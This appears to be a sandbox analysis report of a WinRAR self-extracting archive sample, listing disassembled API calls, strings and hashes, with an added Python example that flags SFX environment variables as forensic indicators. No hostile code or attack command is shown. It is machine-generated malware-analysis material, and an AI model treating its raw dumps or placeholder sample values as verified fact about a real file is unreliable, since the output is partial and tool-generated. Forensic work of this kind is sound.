25890->25893 25892->25890 25893->25888 25903 b20ed 26 API calls Concurrency::cancel_current_task 25894->25903 25896 b16c0 25898 be34a Concurrency::cancel_current_task 25897->25898 25904 bbd8e 87 API calls Concurrency::cancel_current_task 25898->25904 25900 be37c 25905 bbd8e 87 API calls Concurrency::cancel_current_task 25900->25905 25902 be387 25903->25896 25904->25900 25905->25902 25906->25652 25908 bbaa1 25907->25908 25909 bbaba FindFirstFileW 25908->25909 25910 bbb20 FindNextFileW 25908->25910 25912 bbac9 25909->25912 25917 bbb02 25909->25917 25911 bbb2b GetLastError 25910->25911 25910->25917 25911->25917 25913 bcf32 GetCurrentDirectoryW 25912->25913 25914 bbad9 25913->25914 25915 bbadd FindFirstFileW 
25914->25915 25916 bbaf7 GetLastError 25914->25916 25915->25916 25915->25917 25916->25917 25917->25485 25918->25426 25920 c3540 25919->25920 25922 c3560 Concurrency::cancel_current_task 25920->25922 25923 c2206 25920->25923 25924 c24df 82 API calls 25923->25924 25925 c2228 ReleaseSemaphore 25924->25925 25926 c2248 25925->25926 25927 c2266 DeleteCriticalSection CloseHandle CloseHandle 25925->25927 25928 c22fc 80 API calls 25926->25928 25927->25922 25929 c2252 CloseHandle 25928->25929 25929->25926 25929->25927 25930->25268 25931->25277 25932->25277 25933->25280 25934->25287 25936 bb1d2 79 API calls 25935->25936 25937 b208f 25936->25937 25938 b1ad3 116 API calls 25937->25938 25941 b20ac 25937->25941 25939 b209c 25938->25939 25939->25941 25942 b1397 75 API calls 25939->25942 25941->25296 25941->25297 25942->25941 25944 cffc0 25943->25944 25945 bb4e0 GetFileAttributesW 25944->25945 25946 bb4ca 25945->25946 25947 bb4f1 25945->25947 25946->25078 25946->25094 25948 bcf32 GetCurrentDirectoryW 25947->25948 25949 bb505 25948->25949 25949->25946 25950 bb509 GetFileAttributesW 25949->25950 25950->25946 25951->25316 25952->25319 25953->25318 25954->25330 26211 d4bc0 5 API calls _ValidateLocalCookies 26171 cbdd0 74 API calls 26212 d73d0 QueryPerformanceFrequency QueryPerformanceCounter 25962 bacd4 25966 bacde 25962->25966 25963 bacf4 25964 bae2c SetFilePointer 25964->25963 25965 bae49 GetLastError 25964->25965 25965->25963 25966->25963 25966->25964 25967 bae05 25966->25967 25968 baa7a 80 API calls 25966->25968 25967->25964 25968->25967 26172 e05d1 21 API calls __vsnwprintf_l 25977 dcce0 25978 dcce9 25977->25978 25979 dccf2 25977->25979 25981 dcbd7 25978->25981 25982 da505 _abort 38 API calls 25981->25982 25983 dcbe4 25982->25983 26001 dccfe 25983->26001 25985 dcbec 26010 dc96b 25985->26010 25988 dcc03 25988->25979 25989 da7ee __vsnwprintf_l 21 API calls 25990 dcc14 25989->25990 25991 dcc46 25990->25991 26017 dcda0 25990->26017 25994 da65a _free 20 API calls 25991->25994 
25994->25988 25995 dcc41 26027 da7db 20 API calls _abort 25995->26027 25997 dcc8a 25997->25991 26028 dc841 26 API calls 25997->26028 25998 dcc5e 25998->25997 25999 da65a _free 20 API calls 25998->25999 25999->25997 26002 dcd0a ___scrt_is_nonwritable_in_current_image 26001->26002 26003 da505 _abort 38 API calls 26002->26003 26004 dcd14 26003->26004 26008 dcd98 _abort 26004->26008 26009 da65a _free 20 API calls 26004->26009 26029 da0e4 38 API calls _abort 26004->26029 26030 dbde1 EnterCriticalSection 26004->26030 26031 dcd8f LeaveCriticalSection _abort 26004->26031 26008->25985 26009->26004 26011 d5934 __cftof 38 API calls 26010->26011 26012 dc97d 26011->26012 26013 dc98c GetOEMCP 26012->26013 26014 dc99e 26012->26014 26015 dc9b5 26013->26015 26014->26015 26016 dc9a3 GetACP 26014->26016 26015->25988 26015->25989 26016->26015 26018 dc96b 40 API calls 26017->26018 26019 dcdbf 26018->26019 26022 dce10 IsValidCodePage 26019->26022 26024 dcdc6 26019->26024 26026 dce35 __cftof 26019->26026 26020 d0d6c _ValidateLocalCookies 5 API calls 26021 dcc39 26020->26021 26021->25995 26021->25998 26023 dce22 GetCPInfo 26022->26023 26022->26024 26023->26024 26023->26026 26024->26020 26032 dca43 GetCPInfo 26026->26032 26027->25991 26028->25991 26030->26004 26031->26004 26033 dcb27 26032->26033 26035 dca7d 26032->26035 26037 d0d6c _ValidateLocalCookies 5 API calls 26033->26037 26042 ddb38 26035->26042 26039 dcbd3 26037->26039 26039->26024 26041 dbd28 __vsnwprintf_l 43 API calls 26041->26033 26043 d5934 __cftof 38 API calls 26042->26043 26044 ddb58 MultiByteToWideChar 26043->26044 26047 ddb96 26044->26047 26054 ddc2e 26044->26054 26046 ddbb7 __cftof __vsnwprintf_l 26050 ddc28 26046->26050 26053 ddbfc MultiByteToWideChar 26046->26053 26047->26046 26051 da7ee __vsnwprintf_l 21 API calls 26047->26051 26048 d0d6c _ValidateLocalCookies 5 API calls 26049 dcade 26048->26049 26056 dbd28 26049->26056 26061 dbd73 20 API calls _free 26050->26061 26051->26046 26053->26050 26055 ddc18 GetStringTypeW 
26053->26055 26054->26048 26055->26050 26057 d5934 __cftof 38 API calls 26056->26057 26058 dbd3b 26057->26058 26062 dbb0b 26058->26062 26061->26054 26063 dbb26 __vsnwprintf_l 26062->26063 26064 dbb4c MultiByteToWideChar 26063->26064 26065 dbb76 26064->26065 26075 dbd00 26064->26075 26066 dbb97 __vsnwprintf_l 26065->26066 26070 da7ee __vsnwprintf_l 21 API calls 26065->26070 26069 dbbe0 MultiByteToWideChar 26066->26069 26084 dbc4c 26066->26084 26067 d0d6c _ValidateLocalCookies 5 API calls 26068 dbd13 26067->26068 26068->26041 26071 dbbf9 26069->26071 26069->26084 26070->26066 26089 dc11c 26071->26089 26075->26067 26076 dbc5b 26078 da7ee __vsnwprintf_l 21 API calls 26076->26078 26082 dbc7c __vsnwprintf_l 26076->26082 26077 dbc23 26080 dc11c __vsnwprintf_l 11 API calls 26077->26080 26077->26084 26078->26082 26079 dbcf1 26097 dbd73 20 API calls _free 26079->26097 26080->26084 26082->26079 26083 dc11c __vsnwprintf_l 11 API calls 26082->26083 26085 dbcd0 26083->26085 26098 dbd73 20 API calls _free 26084->26098 26085->26079 26086 dbcdf WideCharToMultiByte 26085->26086 26086->26079 26087 dbd1f 26086->26087 26099 dbd73 20 API calls _free 26087->26099 26090 dbe48 _abort 5 API calls 26089->26090 26091 dc143 26090->26091 26094 dc14c 26091->26094 26100 dc1a4 10 API calls 3 library calls 26091->26100 26093 dc18c LCMapStringW 26093->26094 26095 d0d6c _ValidateLocalCookies 5 API calls 26094->26095 26096 dbc10 26095->26096 26096->26076 26096->26077 26096->26084 26097->26084 26098->26075 26099->26084 26100->26093 26145 d10e0 LocalFree 26173 dd1e0 GetProcessHeap 26174 cede1 DialogBoxParamW 26189 cc2e3 79 API calls 26106 b13fd 43 API calls 2 library calls 26191 c2efb GetCPInfo IsDBCSLeadByte 26176 d05f0 27 API calls 26109 ceff2 26110 cefff 26109->26110 26111 bf937 53 API calls 26110->26111 26112 cf00c 26111->26112 26113 b4a20 _swprintf 51 API calls 26112->26113 26114 cf021 SetDlgItemTextW 26113->26114 26115 cc748 5 API calls 26114->26115 26116 cf03e 26115->26116 26147 e30f0 CloseHandle

    Control-flow Graph

    APIs
      • Part of subcall function 000C1B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 000C1B95
      • Part of subcall function 000C1B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000C1BA7
      • Part of subcall function 000C1B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000C1BD8
      • Part of subcall function 000CB64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 000CB655
      • Part of subcall function 000CBD0B: OleInitialize.OLE32(00000000), ref: 000CBD24
      • Part of subcall function 000CBD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000CBD5B
      • Part of subcall function 000CBD0B: SHGetMalloc.SHELL32(000FA460), ref: 000CBD65
    • GetCommandLineW.KERNEL32 ref: 000CF08B
    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 000CF0B5
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 000CF0C6
    • UnmapViewOfFile.KERNEL32(00000000), ref: 000CF117
      • Part of subcall function 000CED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000CED34
      • Part of subcall function 000CED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000CED70
      • Part of subcall function 000C074B: _wcslen.LIBCMT ref: 000C076F
    • CloseHandle.KERNEL32(00000000), ref: 000CF11E
    • GetModuleFileNameW.KERNEL32(00000000,00110CC0,00000800), ref: 000CF138
    • SetEnvironmentVariableW.KERNEL32(sfxname,00110CC0), ref: 000CF144
    • GetLocalTime.KERNEL32(?), ref: 000CF14F
    • _swprintf.LIBCMT ref: 000CF18E
    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 000CF1A3
    • GetModuleHandleW.KERNEL32(00000000), ref: 000CF1AA
    • LoadIconW.USER32(00000000,00000064), ref: 000CF1C1
    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 000CF212
    • Sleep.KERNEL32(?), ref: 000CF240
    • DeleteObject.GDI32 ref: 000CF279
    • DeleteObject.GDI32(?), ref: 000CF289
    • CloseHandle.KERNEL32 ref: 000CF2CC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
    • API String ID: 3014515783-3710569615
    • Opcode ID: de4c71dc30ef8620f11b87f8e9f31ff32bf2a3c9ce63e0c34b4f6e84ac67de50
    • Instruction ID: 59fafb8c3a1e56e98d619765046e4759a86da351439f94b843792f541fbfba2e
    • Opcode Fuzzy Hash: de4c71dc30ef8620f11b87f8e9f31ff32bf2a3c9ce63e0c34b4f6e84ac67de50
    • Instruction Fuzzy Hash: EB610A71900341BBD310ABA1EC49FFF7BEDAB45744F04406EF645A6292DB789D84CBA2
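    The trace above shows the stub stamping four environment variables before it shows STARTDLG: sfxcmd and sfxpar (from the command line recovered through the winrarsfxmappingfile.tmp mapping), sfxname (its own path from GetModuleFileNameW) and sfxstime (GetLocalTime rendered with the format string %4d-%02d-%02d-%02d-%02d-%02d-%03d). Whatever the SFX script launches inherits that environment, so these names are a usable forensic link from a suspicious child process back to the SFX that spawned it. The Python below is an added example, not code from the report or from WinRAR: it decodes a Windows environment block (UTF-16LE, NUL-separated name=value strings, terminated by an empty string, as read from a process's PEB or a memory dump) and flags the SFX variables; the sample block is constructed, and the path values in it are placeholders.

```python
"""Added example: flag WinRAR SFX environment variables in a process environment block."""
import re
from datetime import datetime

# Variable names the SFX stub sets (taken from the SetEnvironmentVariableW calls in the trace).
SFX_ENV_VARS = {"sfxcmd", "sfxpar", "sfxname", "sfxstime"}
# sfxstime format string from the trace: %4d-%02d-%02d-%02d-%02d-%02d-%03d (year may be space padded)
SFXSTIME_RE = re.compile(r"^\s*(\d{1,4})-(\d{2})-(\d{2})-(\d{2})-(\d{2})-(\d{2})-(\d{3})$")


def parse_env_block(block: bytes) -> dict:
    """Decode a UTF-16LE environment block into a dict keyed by lower-cased variable name."""
    text = block.decode("utf-16-le")
    env = {}
    for entry in text.split("\x00"):
        if not entry:
            break  # an empty string terminates the block
        if entry.startswith("="):  # hidden per-drive cwd entries such as "=C:=C:\dir"
            name, _, value = entry[1:].partition("=")
            env["=" + name.lower()] = value
            continue
        name, sep, value = entry.partition("=")
        if sep:
            env[name.lower()] = value
    return env


def sfx_indicators(env: dict) -> dict:
    """Return the SFX-set variables present in env and the parsed sfxstime, if any."""
    found = {k: env[k] for k in SFX_ENV_VARS if k in env}
    result = {"is_winrar_sfx_child": bool(found), "vars": found, "start_time": None}
    m = SFXSTIME_RE.match(found.get("sfxstime", ""))
    if m:
        y, mo, d, h, mi, s, ms = (int(x) for x in m.groups())
        result["start_time"] = datetime(y, mo, d, h, mi, s, ms * 1000)
    return result


def build_env_block(pairs) -> bytes:
    """Constructed test helper: encode (name, value) pairs as a Windows environment block."""
    return ("".join(f"{k}={v}\x00" for k, v in pairs) + "\x00").encode("utf-16-le")


# Constructed sample: the environment a child launched by an SFX 'Setup=' command could carry.
SAMPLE_BLOCK = build_env_block([
    ("=C:", "C:\\Users\\user\\Desktop"),
    ("SystemRoot", "C:\\Windows"),
    ("sfxname", "C:\\Users\\user\\Desktop\\MpkkG8XzhJ.exe"),
    ("sfxstime", "2024-09-30-12-34-56-789"),
    ("sfxcmd", "\"C:\\Users\\user\\Desktop\\MpkkG8XzhJ.exe\" "),
])

if __name__ == "__main__":
    print(sfx_indicators(parse_env_block(SAMPLE_BLOCK)))
```

    On a live host the same check can be made against a child process's environment, but note that the variables only survive in processes the SFX started directly or through its script; a payload that re-spawns itself through a scheduled task or service will not carry them.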

    Control-flow Graph: function 000CB6C2-000CB7E1 (the rendered graph is not reproduced here; the API calls it makes are listed under APIs below)
    APIs
    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000CC91D,00000066), ref: 000CB6D5
    • SizeofResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB6EC
    • LoadResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB703
    • LockResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB712
    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,000CC91D,00000066), ref: 000CB72D
    • GlobalLock.KERNEL32(00000000), ref: 000CB73E
    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000CB762
    • GlobalUnlock.KERNEL32(00000000), ref: 000CB7C6
      • Part of subcall function 000CB626: GdipAlloc.GDIPLUS(00000010), ref: 000CB62C
    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000CB7A7
    • GlobalFree.KERNEL32(00000000), ref: 000CB7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
    • String ID: PNG
    • API String ID: 211097158-364855578
    • Opcode ID: 5d55b9f1886a2720e003844bf9f69d219d7f50f209290a62c9369d3689afb68f
    • Instruction ID: a2b62d7abec444a87b5c42ab07772c96169dc65dc219dec40650cffef0975594
    • Opcode Fuzzy Hash: 5d55b9f1886a2720e003844bf9f69d219d7f50f209290a62c9369d3689afb68f
    • Instruction Fuzzy Hash: 02317071604302ABE7109F61EC89E2F7FA9EF84B91B05061DFD05D6661EB35DC50DBA0

    Control-flow Graph: function 000BBA94-000BBC0A (the rendered graph is not reproduced here; the API calls it makes are listed under APIs below)
    APIs
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBABD
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAEB
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAF7
    • FindNextFileW.KERNEL32(?,?,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBB21
    • GetLastError.KERNEL32(?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBB2D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileFind$ErrorFirstLast$Next_wcslen
    • String ID:
    • API String ID: 42610566-0
    • Opcode ID: cbc24d910dfea7f74d13942dc67a080cf5a035580f62513fc87b972644d13697
    • Instruction ID: a8f553e179648c525199967f667bcb6843b2bf1d157654c61a419c52e731b67c
    • Opcode Fuzzy Hash: cbc24d910dfea7f74d13942dc67a080cf5a035580f62513fc87b972644d13697
    • Instruction Fuzzy Hash: 13415E72900559ABCB25DF68CC94EEDB3B8FB48350F1005AAE56EE3201D7B46E94CF90
    APIs
    • __EH_prolog.LIBCMT ref: 000B92CB
      • Part of subcall function 000BD656: _wcsrchr.LIBVCRUNTIME ref: 000BD660
      • Part of subcall function 000BCAA0: _wcslen.LIBCMT ref: 000BCAA6
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000BB5D6: _wcslen.LIBCMT ref: 000BB5E2
      • Part of subcall function 000BB5D6: __aulldiv.LIBCMT ref: 000BB60E
      • Part of subcall function 000BB5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 000BB615
      • Part of subcall function 000BB5D6: _swprintf.LIBCMT ref: 000BB640
      • Part of subcall function 000BB5D6: _wcslen.LIBCMT ref: 000BB64A
      • Part of subcall function 000BB5D6: _swprintf.LIBCMT ref: 000BB6A0
      • Part of subcall function 000BB5D6: _wcslen.LIBCMT ref: 000BB6AA
      • Part of subcall function 000B4727: __EH_prolog.LIBCMT ref: 000B472C
      • Part of subcall function 000BA212: __EH_prolog.LIBCMT ref: 000BA217
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Strings
    • __tmp_reference_source_, xrefs: 000B9596
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
    • String ID: __tmp_reference_source_
    • API String ID: 70197177-685763994
    • Opcode ID: d21cfc374893efc4ef95636e20a4651011e1f1046e4491f9f04d8a11a1251800
    • Instruction ID: 9ade0926ed9749e1a2b1292a4d633a353bcc6ceb8cabe06cbb81a3bad641c7fb
    • Opcode Fuzzy Hash: d21cfc374893efc4ef95636e20a4651011e1f1046e4491f9f04d8a11a1251800
    • Instruction Fuzzy Hash: 8BA2F871A04245AEDF65DF64C895BFEBBF4BF05300F0841B9EA499B243DB349A44CBA1
    APIs
    • GetCurrentProcess.KERNEL32(?,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002,00000000), ref: 000D91C1
    • TerminateProcess.KERNEL32(00000000,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002,00000000), ref: 000D91C8
    • ExitProcess.KERNEL32 ref: 000D91DA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 86420125a52c4dc5f8de47de534bc4b6a8f4bfe2b8ad46210b29b6efc8d94a72
    • Instruction ID: fdd141ce47e840809e994bd6ae2111c2fb41d6f1c379228a45ec97756a313062
    • Opcode Fuzzy Hash: 86420125a52c4dc5f8de47de534bc4b6a8f4bfe2b8ad46210b29b6efc8d94a72
    • Instruction Fuzzy Hash: 37E04636000248ABDF116FA0DD48A987B7AEB80741B004425F9089A222CB39DD82CA60
    APIs
    • CLSIDFromString.COMBASE(?,?), ref: 000CB0CF
    • CoCreateInstance.COMBASE(?,00000000,00000005,000E64FC,?), ref: 000CB0E6
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateFromInstanceString
    • String ID:
    • API String ID: 432265043-0
    • Opcode ID: 0319f1c5f2fc55088c63e350967d8ab8575af5015931ee68b2ee571c150ee1c3
    • Instruction ID: 636b33b10a16ea4301b2e4d5cd202a873a068e5d123fa79155b2d0e489cb281e
    • Opcode Fuzzy Hash: 0319f1c5f2fc55088c63e350967d8ab8575af5015931ee68b2ee571c150ee1c3
    • Instruction Fuzzy Hash: C5213C75A00514EFEB04DF68DC99D9E7BB9EF48745B00005AFA06EB260DB71AD42CF90
    APIs
    • SetWindowLongW.USER32(?,000000EB), ref: 000CB098
    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 000CB0B3
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$LongNtdllProc_
    • String ID:
    • API String ID: 2044268144-0
    • Opcode ID: a7a39acfdf646812953a98cd49a75f851f5ab866b96511b8d06acdb7608423e5
    • Instruction ID: 031e4a49fe7ef5745a71d4e34a21f9ab462aab703b5824d1ba1a44ec7bbe2281
    • Opcode Fuzzy Hash: a7a39acfdf646812953a98cd49a75f851f5ab866b96511b8d06acdb7608423e5
    • Instruction Fuzzy Hash: A8E0E536100118BB8F129F99DD08DCE3FAAEF8A770B008015FA1956161C771A961EBA0
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 5dfbeca1dd04a9b8db75c6c144f931a59d91cecb2c69f2ba26366e9e33fb708d
    • Instruction ID: 85609b439a977cf9e335788a3f3f346aa78112611aa2c4e9afdd9616d2192c39
    • Opcode Fuzzy Hash: 5dfbeca1dd04a9b8db75c6c144f931a59d91cecb2c69f2ba26366e9e33fb708d
    • Instruction Fuzzy Hash: 39D19371A083448FDB24CF28C884B9EBBE5BF99308F08456DEC8997342D774E945CB5A
    APIs
    • __EH_prolog.LIBCMT ref: 000CC9C5
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CCAB1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000CCACF
    • IsDialogMessageW.USER32(?,?), ref: 000CCAE2
    • TranslateMessage.USER32(?), ref: 000CCAF0
    • DispatchMessageW.USER32(?), ref: 000CCAFA
    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 000CCB1D
    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 000CCB40
    • GetDlgItem.USER32(?,00000068), ref: 000CCB63
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000CCB7E
    • SendMessageW.USER32(00000000,000000C2,00000000,000E45F4), ref: 000CCB91
      • Part of subcall function 000CE586: _wcslen.LIBCMT ref: 000CE5B0
    • SetFocus.USER32(00000000), ref: 000CCB98
    • _swprintf.LIBCMT ref: 000CCBF7
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 000CCC5A
    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 000CCC82
    • GetTickCount.KERNEL32 ref: 000CCCA0
    • _swprintf.LIBCMT ref: 000CCCB8
    • GetLastError.KERNEL32(?,00000011), ref: 000CCCEA
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 000CCD3D
    • _swprintf.LIBCMT ref: 000CCD74
    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 000CCDC8
    • GetCommandLineW.KERNEL32 ref: 000CCDDE
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00101482,00000400,00000001,00000001), ref: 000CCE35
    • Sleep.KERNEL32(00000064), ref: 000CCEA5
    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00101482,00000400), ref: 000CCECE
    • CloseHandle.KERNEL32(00000000), ref: 000CCED7
    • _swprintf.LIBCMT ref: 000CCF0A
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CCF69
    • SetDlgItemTextW.USER32(?,00000065,000E45F4), ref: 000CCF80
    • GetDlgItem.USER32(?,00000065), ref: 000CCF89
    • GetWindowLongW.USER32(00000000,000000F0), ref: 000CCF98
    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000CCFA7
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CD054
    • _wcslen.LIBCMT ref: 000CD0AA
    • _swprintf.LIBCMT ref: 000CD0D4
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 000CD11E
    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 000CD138
    • GetDlgItem.USER32(?,00000068), ref: 000CD141
    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 000CD157
    • GetDlgItem.USER32(?,00000066), ref: 000CD171
    • SetWindowTextW.USER32(00000000,0010389A), ref: 000CD193
    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 000CD1F3
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CD206
    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 000CD2A9
    • EnableWindow.USER32(00000000,00000000), ref: 000CD383
    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 000CD3C5
      • Part of subcall function 000CD872: __EH_prolog.LIBCMT ref: 000CD877
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CD3E9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
    • API String ID: 3593385084-1645151803
    • Opcode ID: f697cee161d1c47631dfa50ac16bd828d595b03e5f6a6aa4af52100db1445c3f
    • Instruction ID: e8483560e823dc3b7821a8167302877201923f453b3ef606e0df36e5ec0cf5fc
    • Opcode Fuzzy Hash: f697cee161d1c47631dfa50ac16bd828d595b03e5f6a6aa4af52100db1445c3f
